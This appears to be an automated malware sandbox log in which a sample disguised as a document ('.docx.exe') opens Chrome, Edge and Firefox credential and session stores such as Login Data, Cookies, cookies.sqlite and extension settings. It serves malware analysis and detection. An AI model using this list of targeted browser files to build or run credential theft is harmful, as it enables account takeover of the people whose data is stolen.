Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\LOG	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
